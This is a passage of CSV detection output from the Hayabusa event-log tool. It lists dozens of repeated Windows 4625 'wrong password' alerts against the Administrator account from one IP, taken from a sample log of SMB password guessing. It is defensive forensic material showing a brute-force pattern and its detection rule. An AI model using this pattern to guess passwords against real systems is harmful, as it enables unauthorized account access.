FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.011 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.057 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.189 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.355 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.435 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.467 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.681 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.754 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.019 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.062 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.100 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.233 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:29.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.365 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.493 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.581 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.618 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.751 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.870 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.957 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.243 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.516 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.561 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.937 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.162 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.214 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.425 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
